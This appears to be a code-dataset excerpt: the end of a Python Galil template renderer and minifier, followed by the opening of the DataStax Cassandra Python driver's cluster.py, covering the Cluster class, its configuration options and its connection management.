# A line containing just a label
label_line = re.compile(r"^#[a-zA-Z0-9]{1,7}$")
# A line that starts with a label
label_start = re.compile(r"^#")
# Joinable Lines (combinations of the following):
# - Simple Assignments: assignments to our variables or arrays (start with lower)
# - ENDIF, ELSE
# NOTE: a joinable line never ends in a semicolon - this provides a way to force a line break
joinable_line = re.compile(r"""
^(?: (?:^|;) \s*
(?:
(?:[~^][a-z]|[a-z][a-zA-Z0-9]{0,7}(?:\[[^\];]+\])?)
\s* = \s* [^\;]+
| ENDIF
| ELSE
)
\s*)+$
""", re.X)
_lines1 = []
# Start with simple compaction (removes extra garbage and makes
# later length calculations more reliable
for line in content.split("\n"):
line = re.sub(comment, '', line)
line = re.sub(operator_spaces, '\\1', line)
line = line.strip()
if len(line):
_lines1.append(line)
# The more advanced stuff: line merging, etc
i = 0
_lines2 = []
while i < len(_lines1):
line = _lines1[i]
while ( i < len(_lines1) - 1
and joinable_line.match(_lines1[i+1])
and self.line_length > len(line + ";" + _lines1[i+1])
):
line = line + ";" + _lines1[i+1]
i += 1
if len(line):
_lines2.append(line)
i += 1
# Squash label into next line (assuming it isn't itself a label)
i = 0
while i < len(_lines2):
line = _lines2[i]
if ( i < len(_lines2) - 1
and label_line.match(line)
and not label_start.match(_lines2[i+1])
and self.line_length > len(line + ";" + _lines2[i+1])
):
line = line + ";" + _lines2[i+1]
i += 1
if ( i < len(_lines2) - 1
and _lines2[i+1] == 'EN'
and self.line_length > len(line + ";" + _lines2[i+1])
):
line = line + ";" + _lines2[i+1]
i += 1
# double semicolons confuse galil but are somewhat easy to
# introduce when templating and doing strange minification.
# Strip them out again just to be sure:
line = line_end_semi.sub('',(double_semi.sub(r'\1',line)))
if len(line):
lines.append(line)
i += 1
for i, line in enumerate(lines):
if (len(line) > self.line_length):
logger.error("Long line '%s' in minified galil output", line)
return "\n".join(lines)
def trim(self, content):
"""
Performs whitespace trimming on a galil file.
"""
lines = []
for line in content.split("\n"):
line = line.strip()
if len(line):
lines.append(line)
return "\n".join(lines)
def render(self, name, context):
"""
Renders a galil template file (substitutes variables and expands
inclusions), but does not perform whitespace trimming or
minification.
"""
content = self.env.get_template(name).render(context)
# double semicolons confuse galil but are somewhat easy to
# introduce when templating. Strip them out here:
return re.sub(r';(\s*)(?=;)', r'\1', content).encode('utf-8')
def get_template(self, name):
"""
Gets the jinja template object for a template file.
"""
return self.env.get_template(name)
| lgpl-3.0 | 4,899,683,945,039,046,000 | 34.6974 | 145 | 0.515762 | false |
kishkaru/python-driver | cassandra/cluster.py | 1 | 149094 | # Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module houses the main classes you will interact with,
:class:`.Cluster` and :class:`.Session`.
"""
from __future__ import absolute_import
import atexit
from collections import defaultdict, Mapping
from concurrent.futures import ThreadPoolExecutor
import logging
from random import random
import socket
import sys
import time
from threading import Lock, RLock, Thread, Event
import six
from six.moves import range
from six.moves import queue as Queue
import weakref
from weakref import WeakValueDictionary
try:
from weakref import WeakSet
except ImportError:
from cassandra.util import WeakSet # NOQA
from functools import partial, wraps
from itertools import groupby, count
from cassandra import (ConsistencyLevel, AuthenticationFailed,
OperationTimedOut, UnsupportedOperation,
SchemaTargetType, DriverException)
from cassandra.connection import (ConnectionException, ConnectionShutdown,
ConnectionHeartbeat, ProtocolVersionUnsupported)
from cassandra.cqltypes import UserType
from cassandra.encoder import Encoder
from cassandra.protocol import (QueryMessage, ResultMessage,
ErrorMessage, ReadTimeoutErrorMessage,
WriteTimeoutErrorMessage,
UnavailableErrorMessage,
OverloadedErrorMessage,
PrepareMessage, ExecuteMessage,
PreparedQueryNotFound,
IsBootstrappingErrorMessage,
BatchMessage, RESULT_KIND_PREPARED,
RESULT_KIND_SET_KEYSPACE, RESULT_KIND_ROWS,
RESULT_KIND_SCHEMA_CHANGE, MIN_SUPPORTED_VERSION,
ProtocolHandler)
from cassandra.metadata import Metadata, protect_name, murmur3
from cassandra.policies import (TokenAwarePolicy, DCAwareRoundRobinPolicy, SimpleConvictionPolicy,
ExponentialReconnectionPolicy, HostDistance,
RetryPolicy, IdentityTranslator)
from cassandra.pool import (Host, _ReconnectionHandler, _HostReconnectionHandler,
HostConnectionPool, HostConnection,
NoConnectionsAvailable)
from cassandra.query import (SimpleStatement, PreparedStatement, BoundStatement,
BatchStatement, bind_params, QueryTrace,
named_tuple_factory, dict_factory, tuple_factory, FETCH_SIZE_UNSET)
def _is_eventlet_monkey_patched():
if 'eventlet.patcher' not in sys.modules:
return False
import eventlet.patcher
return eventlet.patcher.is_monkey_patched('socket')
def _is_gevent_monkey_patched():
if 'gevent.monkey' not in sys.modules:
return False
import gevent.socket
return socket.socket is gevent.socket.socket
# default to gevent when we are monkey patched with gevent, eventlet when
# monkey patched with eventlet, otherwise if libev is available, use that as
# the default because it's fastest. Otherwise, use asyncore.
if _is_gevent_monkey_patched():
from cassandra.io.geventreactor import GeventConnection as DefaultConnection
elif _is_eventlet_monkey_patched():
from cassandra.io.eventletreactor import EventletConnection as DefaultConnection
else:
try:
from cassandra.io.libevreactor import LibevConnection as DefaultConnection # NOQA
except ImportError:
from cassandra.io.asyncorereactor import AsyncoreConnection as DefaultConnection # NOQA
# Forces load of utf8 encoding module to avoid deadlock that occurs
# if code that is being imported tries to import the module in a seperate
# thread.
# See http://bugs.python.org/issue10923
"".encode('utf8')
log = logging.getLogger(__name__)
DEFAULT_MIN_REQUESTS = 5
DEFAULT_MAX_REQUESTS = 100
DEFAULT_MIN_CONNECTIONS_PER_LOCAL_HOST = 2
DEFAULT_MAX_CONNECTIONS_PER_LOCAL_HOST = 8
DEFAULT_MIN_CONNECTIONS_PER_REMOTE_HOST = 1
DEFAULT_MAX_CONNECTIONS_PER_REMOTE_HOST = 2
_NOT_SET = object()
class NoHostAvailable(Exception):
"""
Raised when an operation is attempted but all connections are
busy, defunct, closed, or resulted in errors when used.
"""
errors = None
"""
A map of the form ``{ip: exception}`` which details the particular
Exception that was caught for each host the operation was attempted
against.
"""
def __init__(self, message, errors):
Exception.__init__(self, message, errors)
self.errors = errors
def _future_completed(future):
""" Helper for run_in_executor() """
exc = future.exception()
if exc:
log.debug("Failed to run task on executor", exc_info=exc)
def run_in_executor(f):
"""
A decorator to run the given method in the ThreadPoolExecutor.
"""
@wraps(f)
def new_f(self, *args, **kwargs):
if self.is_shutdown:
return
try:
future = self.executor.submit(f, self, *args, **kwargs)
future.add_done_callback(_future_completed)
except Exception:
log.exception("Failed to submit task to executor")
return new_f
_clusters_for_shutdown = set()
def _register_cluster_shutdown(cluster):
_clusters_for_shutdown.add(cluster)
def _discard_cluster_shutdown(cluster):
_clusters_for_shutdown.discard(cluster)
def _shutdown_clusters():
clusters = _clusters_for_shutdown.copy() # copy because shutdown modifies the global set "discard"
for cluster in clusters:
cluster.shutdown()
atexit.register(_shutdown_clusters)
# murmur3 implementation required for TokenAware is only available for CPython
import platform
if platform.python_implementation() == 'CPython':
def default_lbp_factory():
if murmur3 is not None:
return TokenAwarePolicy(DCAwareRoundRobinPolicy())
return DCAwareRoundRobinPolicy()
else:
def default_lbp_factory():
return DCAwareRoundRobinPolicy()
class Cluster(object):
"""
The main class to use when interacting with a Cassandra cluster.
Typically, one instance of this class will be created for each
separate Cassandra cluster that your application interacts with.
Example usage::
>>> from cassandra.cluster import Cluster
>>> cluster = Cluster(['192.168.1.1', '192.168.1.2'])
>>> session = cluster.connect()
>>> session.execute("CREATE KEYSPACE ...")
>>> ...
>>> cluster.shutdown()
``Cluster`` and ``Session`` also provide context management functions
which implicitly handle shutdown when leaving scope.
"""
contact_points = ['127.0.0.1']
"""
The list of contact points to try connecting for cluster discovery.
Defaults to loopback interface.
Note: When using :class:`.DCAwareLoadBalancingPolicy` with no explicit
local_dc set (as is the default), the DC is chosen from an arbitrary
host in contact_points. In this case, contact_points should contain
only nodes from a single, local DC.
"""
port = 9042
"""
The server-side port to open connections to. Defaults to 9042.
"""
cql_version = None
"""
If a specific version of CQL should be used, this may be set to that
string version. Otherwise, the highest CQL version supported by the
server will be automatically used.
"""
protocol_version = 4
"""
The maximum version of the native protocol to use.
The driver will automatically downgrade version based on a negotiation with
the server, but it is most efficient to set this to the maximum supported
by your version of Cassandra. Setting this will also prevent conflicting
versions negotiated if your cluster is upgraded.
Version 2 of the native protocol adds support for lightweight transactions,
batch operations, and automatic query paging. The v2 protocol is
supported by Cassandra 2.0+.
Version 3 of the native protocol adds support for protocol-level
client-side timestamps (see :attr:`.Session.use_client_timestamp`),
serial consistency levels for :class:`~.BatchStatement`, and an
improved connection pool.
Version 4 of the native protocol adds a number of new types, server warnings,
new failure messages, and custom payloads. Details in the
`project docs <https://github.com/apache/cassandra/blob/trunk/doc/native_protocol_v4.spec>`_
The following table describes the native protocol versions that
are supported by each version of Cassandra:
+-------------------+-------------------+
| Cassandra Version | Protocol Versions |
+===================+===================+
| 1.2 | 1 |
+-------------------+-------------------+
| 2.0 | 1, 2 |
+-------------------+-------------------+
| 2.1 | 1, 2, 3 |
+-------------------+-------------------+
| 2.2 | 1, 2, 3, 4 |
+-------------------+-------------------+
"""
compression = True
"""
Controls compression for communications between the driver and Cassandra.
If left as the default of :const:`True`, either lz4 or snappy compression
may be used, depending on what is supported by both the driver
and Cassandra. If both are fully supported, lz4 will be preferred.
You may also set this to 'snappy' or 'lz4' to request that specific
compression type.
Setting this to :const:`False` disables compression.
"""
_auth_provider = None
_auth_provider_callable = None
@property
def auth_provider(self):
"""
When :attr:`~.Cluster.protocol_version` is 2 or higher, this should
be an instance of a subclass of :class:`~cassandra.auth.AuthProvider`,
such as :class:`~.PlainTextAuthProvider`.
When :attr:`~.Cluster.protocol_version` is 1, this should be
a function that accepts one argument, the IP address of a node,
and returns a dict of credentials for that node.
When not using authentication, this should be left as :const:`None`.
"""
return self._auth_provider
@auth_provider.setter # noqa
def auth_provider(self, value):
if not value:
self._auth_provider = value
return
try:
self._auth_provider_callable = value.new_authenticator
except AttributeError:
if self.protocol_version > 1:
raise TypeError("auth_provider must implement the cassandra.auth.AuthProvider "
"interface when protocol_version >= 2")
elif not callable(value):
raise TypeError("auth_provider must be callable when protocol_version == 1")
self._auth_provider_callable = value
self._auth_provider = value
load_balancing_policy = None
"""
An instance of :class:`.policies.LoadBalancingPolicy` or
one of its subclasses.
.. versionchanged:: 2.6.0
Defaults to :class:`~.TokenAwarePolicy` (:class:`~.DCAwareRoundRobinPolicy`).
when using CPython (where the murmur3 extension is available). :class:`~.DCAwareRoundRobinPolicy`
otherwise. Default local DC will be chosen from contact points.
**Please see** :class:`~.DCAwareRoundRobinPolicy` **for a discussion on default behavior with respect to
DC locality and remote nodes.**
"""
reconnection_policy = ExponentialReconnectionPolicy(1.0, 600.0)
"""
An instance of :class:`.policies.ReconnectionPolicy`. Defaults to an instance
of :class:`.ExponentialReconnectionPolicy` with a base delay of one second and
a max delay of ten minutes.
"""
default_retry_policy = RetryPolicy()
"""
A default :class:`.policies.RetryPolicy` instance to use for all
:class:`.Statement` objects which do not have a :attr:`~.Statement.retry_policy`
explicitly set.
"""
conviction_policy_factory = SimpleConvictionPolicy
"""
A factory function which creates instances of
:class:`.policies.ConvictionPolicy`. Defaults to
:class:`.policies.SimpleConvictionPolicy`.
"""
address_translator = IdentityTranslator()
"""
:class:`.policies.AddressTranslator` instance to be used in translating server node addresses
to driver connection addresses.
"""
connect_to_remote_hosts = True
"""
If left as :const:`True`, hosts that are considered :attr:`~.HostDistance.REMOTE`
by the :attr:`~.Cluster.load_balancing_policy` will have a connection
opened to them. Otherwise, they will not have a connection opened to them.
Note that the default load balancing policy ignores remote hosts by default.
.. versionadded:: 2.1.0
"""
metrics_enabled = False
"""
Whether or not metric collection is enabled. If enabled, :attr:`.metrics`
will be an instance of :class:`~cassandra.metrics.Metrics`.
"""
metrics = None
"""
An instance of :class:`cassandra.metrics.Metrics` if :attr:`.metrics_enabled` is
:const:`True`, else :const:`None`.
"""
ssl_options = None
"""
A optional dict which will be used as kwargs for ``ssl.wrap_socket()``
when new sockets are created. This should be used when client encryption
is enabled in Cassandra.
By default, a ``ca_certs`` value should be supplied (the value should be
a string pointing to the location of the CA certs file), and you probably
want to specify ``ssl_version`` as ``ssl.PROTOCOL_TLSv1`` to match
Cassandra's default protocol.
.. versionchanged:: 3.3.0
In addition to ``wrap_socket`` kwargs, clients may also specify ``'check_hostname': True`` to verify the cert hostname
as outlined in RFC 2818 and RFC 6125. Note that this requires the certificate to be transferred, so
should almost always require the option ``'cert_reqs': ssl.CERT_REQUIRED``. Note also that this functionality was not built into
Python standard library until (2.7.9, 3.2). To enable this mechanism in earlier versions, patch ``ssl.match_hostname``
with a custom or `back-ported function <https://pypi.python.org/pypi/backports.ssl_match_hostname>`_.
"""
sockopts = None
"""
An optional list of tuples which will be used as arguments to
``socket.setsockopt()`` for all created sockets.
Note: some drivers find setting TCPNODELAY beneficial in the context of
their execution model. It was not found generally beneficial for this driver.
To try with your own workload, set ``sockopts = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]``
"""
max_schema_agreement_wait = 10
"""
The maximum duration (in seconds) that the driver will wait for schema
agreement across the cluster. Defaults to ten seconds.
If set <= 0, the driver will bypass schema agreement waits altogether.
"""
metadata = None
"""
An instance of :class:`cassandra.metadata.Metadata`.
"""
connection_class = DefaultConnection
"""
This determines what event loop system will be used for managing
I/O with Cassandra. These are the current options:
* :class:`cassandra.io.asyncorereactor.AsyncoreConnection`
* :class:`cassandra.io.libevreactor.LibevConnection`
* :class:`cassandra.io.eventletreactor.EventletConnection` (requires monkey-patching - see doc for details)
* :class:`cassandra.io.geventreactor.GeventConnection` (requires monkey-patching - see doc for details)
* :class:`cassandra.io.twistedreactor.TwistedConnection`
By default, ``AsyncoreConnection`` will be used, which uses
the ``asyncore`` module in the Python standard library.
If ``libev`` is installed, ``LibevConnection`` will be used instead.
If ``gevent`` or ``eventlet`` monkey-patching is detected, the corresponding
connection class will be used automatically.
"""
control_connection_timeout = 2.0
"""
A timeout, in seconds, for queries made by the control connection, such
as querying the current schema and information about nodes in the cluster.
If set to :const:`None`, there will be no timeout for these queries.
"""
idle_heartbeat_interval = 30
"""
Interval, in seconds, on which to heartbeat idle connections. This helps
keep connections open through network devices that expire idle connections.
It also helps discover bad connections early in low-traffic scenarios.
Setting to zero disables heartbeats.
"""
schema_event_refresh_window = 2
"""
Window, in seconds, within which a schema component will be refreshed after
receiving a schema_change event.
The driver delays a random amount of time in the range [0.0, window)
before executing the refresh. This serves two purposes:
1.) Spread the refresh for deployments with large fanout from C* to client tier,
preventing a 'thundering herd' problem with many clients refreshing simultaneously.
2.) Remove redundant refreshes. Redundant events arriving within the delay period
are discarded, and only one refresh is executed.
Setting this to zero will execute refreshes immediately.
Setting this negative will disable schema refreshes in response to push events
(refreshes will still occur in response to schema change responses to DDL statements
executed by Sessions of this Cluster).
"""
topology_event_refresh_window = 10
"""
Window, in seconds, within which the node and token list will be refreshed after
receiving a topology_change event.
Setting this to zero will execute refreshes immediately.
Setting this negative will disable node refreshes in response to push events.
See :attr:`.schema_event_refresh_window` for discussion of rationale
"""
status_event_refresh_window = 2
"""
Window, in seconds, within which the driver will start the reconnect after
receiving a status_change event.
Setting this to zero will connect immediately.
This is primarily used to avoid 'thundering herd' in deployments with large fanout from cluster to clients.
When nodes come up, clients attempt to reprepare prepared statements (depending on :attr:`.reprepare_on_up`), and
establish connection pools. This can cause a rush of connections and queries if not mitigated with this factor.
"""
prepare_on_all_hosts = True
"""
Specifies whether statements should be prepared on all hosts, or just one.
This can reasonably be disabled on long-running applications with numerous clients preparing statements on startup,
where a randomized initial condition of the load balancing policy can be expected to distribute prepares from
different clients across the cluster.
"""
reprepare_on_up = True
"""
Specifies whether all known prepared statements should be prepared on a node when it comes up.
May be used to avoid overwhelming a node on return, or if it is supposed that the node was only marked down due to
network. If statements are not reprepared, they are prepared on the first execution, causing
an extra roundtrip for one or more client requests.
"""
connect_timeout = 5
"""
Timeout, in seconds, for creating new connections.
This timeout covers the entire connection negotiation, including TCP
establishment, options passing, and authentication.
"""
@property
def schema_metadata_enabled(self):
"""
Flag indicating whether internal schema metadata is updated.
When disabled, the driver does not populate Cluster.metadata.keyspaces on connect, or on schema change events. This
can be used to speed initial connection, and reduce load on client and server during operation. Turning this off
gives away token aware request routing, and programmatic inspection of the metadata model.
"""
return self.control_connection._schema_meta_enabled
@schema_metadata_enabled.setter
def schema_metadata_enabled(self, enabled):
self.control_connection._schema_meta_enabled = bool(enabled)
@property
def token_metadata_enabled(self):
"""
Flag indicating whether internal token metadata is updated.
When disabled, the driver does not query node token information on connect, or on topology change events. This
can be used to speed initial connection, and reduce load on client and server during operation. It is most useful
in large clusters using vnodes, where the token map can be expensive to compute. Turning this off
gives away token aware request routing, and programmatic inspection of the token ring.
"""
return self.control_connection._token_meta_enabled
@token_metadata_enabled.setter
def token_metadata_enabled(self, enabled):
self.control_connection._token_meta_enabled = bool(enabled)
sessions = None
control_connection = None
scheduler = None
executor = None
is_shutdown = False
_is_setup = False
_prepared_statements = None
_prepared_statement_lock = None
_idle_heartbeat = None
_user_types = None
"""
A map of {keyspace: {type_name: UserType}}
"""
_listeners = None
_listener_lock = None
def __init__(self,
contact_points=["127.0.0.1"],
port=9042,
compression=True,
auth_provider=None,
load_balancing_policy=None,
reconnection_policy=None,
default_retry_policy=None,
conviction_policy_factory=None,
metrics_enabled=False,
connection_class=None,
ssl_options=None,
sockopts=None,
cql_version=None,
protocol_version=4,
executor_threads=2,
max_schema_agreement_wait=10,
control_connection_timeout=2.0,
idle_heartbeat_interval=30,
schema_event_refresh_window=2,
topology_event_refresh_window=10,
connect_timeout=5,
schema_metadata_enabled=True,
token_metadata_enabled=True,
address_translator=None,
status_event_refresh_window=2,
prepare_on_all_hosts=True,
reprepare_on_up=True):
"""
``executor_threads`` defines the number of threads in a pool for handling asynchronous tasks such as
extablishing connection pools or refreshing metadata.
Any of the mutable Cluster attributes may be set as keyword arguments to the constructor.
"""
if contact_points is not None:
if isinstance(contact_points, six.string_types):
raise TypeError("contact_points should not be a string, it should be a sequence (e.g. list) of strings")
if None in contact_points:
raise ValueError("contact_points should not contain None (it can resolve to localhost)")
self.contact_points = contact_points
self.port = port
self.contact_points_resolved = [endpoint[4][0] for a in self.contact_points
for endpoint in socket.getaddrinfo(a, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)]
self.compression = compression
self.protocol_version = protocol_version
self.auth_provider = auth_provider
if load_balancing_policy is not None:
if isinstance(load_balancing_policy, type):
raise TypeError("load_balancing_policy should not be a class, it should be an instance of that class")
self.load_balancing_policy = load_balancing_policy
else:
self.load_balancing_policy = default_lbp_factory()
if reconnection_policy is not None:
if isinstance(reconnection_policy, type):
raise TypeError("reconnection_policy should not be a class, it should be an instance of that class")
self.reconnection_policy = reconnection_policy
if default_retry_policy is not None:
if isinstance(default_retry_policy, type):
raise TypeError("default_retry_policy should not be a class, it should be an instance of that class")
self.default_retry_policy = default_retry_policy
if conviction_policy_factory is not None:
if not callable(conviction_policy_factory):
raise ValueError("conviction_policy_factory must be callable")
self.conviction_policy_factory = conviction_policy_factory
if address_translator is not None:
if isinstance(address_translator, type):
raise TypeError("address_translator should not be a class, it should be an instance of that class")
self.address_translator = address_translator
if connection_class is not None:
self.connection_class = connection_class
self.metrics_enabled = metrics_enabled
self.ssl_options = ssl_options
self.sockopts = sockopts
self.cql_version = cql_version
self.max_schema_agreement_wait = max_schema_agreement_wait
self.control_connection_timeout = control_connection_timeout
self.idle_heartbeat_interval = idle_heartbeat_interval
self.schema_event_refresh_window = schema_event_refresh_window
self.topology_event_refresh_window = topology_event_refresh_window
self.status_event_refresh_window = status_event_refresh_window
self.connect_timeout = connect_timeout
self.prepare_on_all_hosts = prepare_on_all_hosts
self.reprepare_on_up = reprepare_on_up
self._listeners = set()
self._listener_lock = Lock()
# let Session objects be GC'ed (and shutdown) when the user no longer
# holds a reference.
self.sessions = WeakSet()
self.metadata = Metadata()
self.control_connection = None
self._prepared_statements = WeakValueDictionary()
self._prepared_statement_lock = Lock()
self._user_types = defaultdict(dict)
self._min_requests_per_connection = {
HostDistance.LOCAL: DEFAULT_MIN_REQUESTS,
HostDistance.REMOTE: DEFAULT_MIN_REQUESTS
}
self._max_requests_per_connection = {
HostDistance.LOCAL: DEFAULT_MAX_REQUESTS,
HostDistance.REMOTE: DEFAULT_MAX_REQUESTS
}
self._core_connections_per_host = {
HostDistance.LOCAL: DEFAULT_MIN_CONNECTIONS_PER_LOCAL_HOST,
HostDistance.REMOTE: DEFAULT_MIN_CONNECTIONS_PER_REMOTE_HOST
}
self._max_connections_per_host = {
HostDistance.LOCAL: DEFAULT_MAX_CONNECTIONS_PER_LOCAL_HOST,
HostDistance.REMOTE: DEFAULT_MAX_CONNECTIONS_PER_REMOTE_HOST
}
self.executor = ThreadPoolExecutor(max_workers=executor_threads)
self.scheduler = _Scheduler(self.executor)
self._lock = RLock()
if self.metrics_enabled:
from cassandra.metrics import Metrics
self.metrics = Metrics(weakref.proxy(self))
self.control_connection = ControlConnection(
self, self.control_connection_timeout,
self.schema_event_refresh_window, self.topology_event_refresh_window,
self.status_event_refresh_window,
schema_metadata_enabled, token_metadata_enabled)
def register_user_type(self, keyspace, user_type, klass):
"""
Registers a class to use to represent a particular user-defined type.
Query parameters for this user-defined type will be assumed to be
instances of `klass`. Result sets for this user-defined type will
be instances of `klass`. If no class is registered for a user-defined
type, a namedtuple will be used for result sets, and non-prepared
statements may not encode parameters for this type correctly.
`keyspace` is the name of the keyspace that the UDT is defined in.
`user_type` is the string name of the UDT to register the mapping
for.
`klass` should be a class with attributes whose names match the
fields of the user-defined type. The constructor must accepts kwargs
for each of the fields in the UDT.
This method should only be called after the type has been created
within Cassandra.
Example::
cluster = Cluster(protocol_version=3)
session = cluster.connect()
session.set_keyspace('mykeyspace')
session.execute("CREATE TYPE address (street text, zipcode int)")
session.execute("CREATE TABLE users (id int PRIMARY KEY, location address)")
# create a class to map to the "address" UDT
class Address(object):
def __init__(self, street, zipcode):
self.street = street
self.zipcode = zipcode
cluster.register_user_type('mykeyspace', 'address', Address)
# insert a row using an instance of Address
session.execute("INSERT INTO users (id, location) VALUES (%s, %s)",
(0, Address("123 Main St.", 78723)))
# results will include Address instances
results = session.execute("SELECT * FROM users")
row = results[0]
print row.id, row.location.street, row.location.zipcode
"""
if self.protocol_version < 3:
log.warning("User Type serialization is only supported in native protocol version 3+ (%d in use). "
"CQL encoding for simple statements will still work, but named tuples will "
"be returned when reading type %s.%s.", self.protocol_version, keyspace, user_type)
self._user_types[keyspace][user_type] = klass
for session in self.sessions:
session.user_type_registered(keyspace, user_type, klass)
UserType.evict_udt_class(keyspace, user_type)
def get_min_requests_per_connection(self, host_distance):
return self._min_requests_per_connection[host_distance]
def set_min_requests_per_connection(self, host_distance, min_requests):
"""
Sets a threshold for concurrent requests per connection, below which
connections will be considered for disposal (down to core connections;
see :meth:`~Cluster.set_core_connections_per_host`).
Pertains to connection pool management in protocol versions {1,2}.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_min_requests_per_connection() only has an effect "
"when using protocol_version 1 or 2.")
if min_requests < 0 or min_requests > 126 or \
min_requests >= self._max_requests_per_connection[host_distance]:
raise ValueError("min_requests must be 0-126 and less than the max_requests for this host_distance (%d)" %
(self._min_requests_per_connection[host_distance],))
self._min_requests_per_connection[host_distance] = min_requests
def get_max_requests_per_connection(self, host_distance):
return self._max_requests_per_connection[host_distance]
def set_max_requests_per_connection(self, host_distance, max_requests):
"""
Sets a threshold for concurrent requests per connection, above which new
connections will be created to a host (up to max connections;
see :meth:`~Cluster.set_max_connections_per_host`).
Pertains to connection pool management in protocol versions {1,2}.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_max_requests_per_connection() only has an effect "
"when using protocol_version 1 or 2.")
if max_requests < 1 or max_requests > 127 or \
max_requests <= self._min_requests_per_connection[host_distance]:
raise ValueError("max_requests must be 1-127 and greater than the min_requests for this host_distance (%d)" %
(self._min_requests_per_connection[host_distance],))
self._max_requests_per_connection[host_distance] = max_requests
def get_core_connections_per_host(self, host_distance):
"""
Gets the minimum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
This property is ignored if :attr:`~.Cluster.protocol_version` is
3 or higher.
"""
return self._core_connections_per_host[host_distance]
def set_core_connections_per_host(self, host_distance, core_connections):
"""
Sets the minimum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
Protocol version 1 and 2 are limited in the number of concurrent
requests they can send per connection. The driver implements connection
pooling to support higher levels of concurrency.
If :attr:`~.Cluster.protocol_version` is set to 3 or higher, this
is not supported (there is always one connection per host, unless
the host is remote and :attr:`connect_to_remote_hosts` is :const:`False`)
and using this will result in an :exc:`~.UnsupporteOperation`.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_core_connections_per_host() only has an effect "
"when using protocol_version 1 or 2.")
old = self._core_connections_per_host[host_distance]
self._core_connections_per_host[host_distance] = core_connections
if old < core_connections:
self._ensure_core_connections()
def get_max_connections_per_host(self, host_distance):
"""
Gets the maximum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 8 for :attr:`~HostDistance.LOCAL` and 2 for
:attr:`~HostDistance.REMOTE`.
This property is ignored if :attr:`~.Cluster.protocol_version` is
3 or higher.
"""
return self._max_connections_per_host[host_distance]
def set_max_connections_per_host(self, host_distance, max_connections):
"""
Sets the maximum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
If :attr:`~.Cluster.protocol_version` is set to 3 or higher, this
is not supported (there is always one connection per host, unless
the host is remote and :attr:`connect_to_remote_hosts` is :const:`False`)
and using this will result in an :exc:`~.UnsupporteOperation`.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_max_connections_per_host() only has an effect "
"when using protocol_version 1 or 2.")
self._max_connections_per_host[host_distance] = max_connections
def connection_factory(self, address, *args, **kwargs):
"""
Called to create a new connection with proper configuration.
Intended for internal use only.
"""
kwargs = self._make_connection_kwargs(address, kwargs)
return self.connection_class.factory(address, self.connect_timeout, *args, **kwargs)
def _make_connection_factory(self, host, *args, **kwargs):
kwargs = self._make_connection_kwargs(host.address, kwargs)
return partial(self.connection_class.factory, host.address, self.connect_timeout, *args, **kwargs)
def _make_connection_kwargs(self, address, kwargs_dict):
if self._auth_provider_callable:
kwargs_dict.setdefault('authenticator', self._auth_provider_callable(address))
kwargs_dict.setdefault('port', self.port)
kwargs_dict.setdefault('compression', self.compression)
kwargs_dict.setdefault('sockopts', self.sockopts)
kwargs_dict.setdefault('ssl_options', self.ssl_options)
kwargs_dict.setdefault('cql_version', self.cql_version)
kwargs_dict.setdefault('protocol_version', self.protocol_version)
kwargs_dict.setdefault('user_type_map', self._user_types)
return kwargs_dict
def protocol_downgrade(self, host_addr, previous_version):
new_version = previous_version - 1
if new_version < self.protocol_version:
if new_version >= MIN_SUPPORTED_VERSION:
log.warning("Downgrading core protocol version from %d to %d for %s. "
"To avoid this, it is best practice to explicitly set Cluster(protocol_version) to the version supported by your cluster. "
"http://datastax.github.io/python-driver/api/cassandra/cluster.html#cassandra.cluster.Cluster.protocol_version", self.protocol_version, new_version, host_addr)
self.protocol_version = new_version
else:
raise DriverException("Cannot downgrade protocol version (%d) below minimum supported version: %d" % (new_version, MIN_SUPPORTED_VERSION))
def connect(self, keyspace=None):
"""
Creates and returns a new :class:`~.Session` object. If `keyspace`
is specified, that keyspace will be the default keyspace for
operations on the ``Session``.
"""
with self._lock:
if self.is_shutdown:
raise DriverException("Cluster is already shut down")
if not self._is_setup:
log.debug("Connecting to cluster, contact points: %s; protocol version: %s",
self.contact_points, self.protocol_version)
self.connection_class.initialize_reactor()
_register_cluster_shutdown(self)
for address in self.contact_points_resolved:
host, new = self.add_host(address, signal=False)
if new:
host.set_up()
for listener in self.listeners:
listener.on_add(host)
self.load_balancing_policy.populate(
weakref.proxy(self), self.metadata.all_hosts())
try:
self.control_connection.connect()
log.debug("Control connection created")
except Exception:
log.exception("Control connection failed to connect, "
"shutting down Cluster:")
self.shutdown()
raise
self.load_balancing_policy.check_supported()
if self.idle_heartbeat_interval:
self._idle_heartbeat = ConnectionHeartbeat(self.idle_heartbeat_interval, self.get_connection_holders)
self._is_setup = True
session = self._new_session()
if keyspace:
session.set_keyspace(keyspace)
return session
def get_connection_holders(self):
holders = []
for s in self.sessions:
holders.extend(s.get_pools())
holders.append(self.control_connection)
return holders
def shutdown(self):
"""
Closes all sessions and connection associated with this Cluster.
To ensure all connections are properly closed, **you should always
call shutdown() on a Cluster instance when you are done with it**.
Once shutdown, a Cluster should not be used for any purpose.
"""
with self._lock:
if self.is_shutdown:
return
else:
self.is_shutdown = True
if self._idle_heartbeat:
self._idle_heartbeat.stop()
self.scheduler.shutdown()
self.control_connection.shutdown()
for session in self.sessions:
session.shutdown()
self.executor.shutdown()
_discard_cluster_shutdown(self)
def __enter__(self):
return self
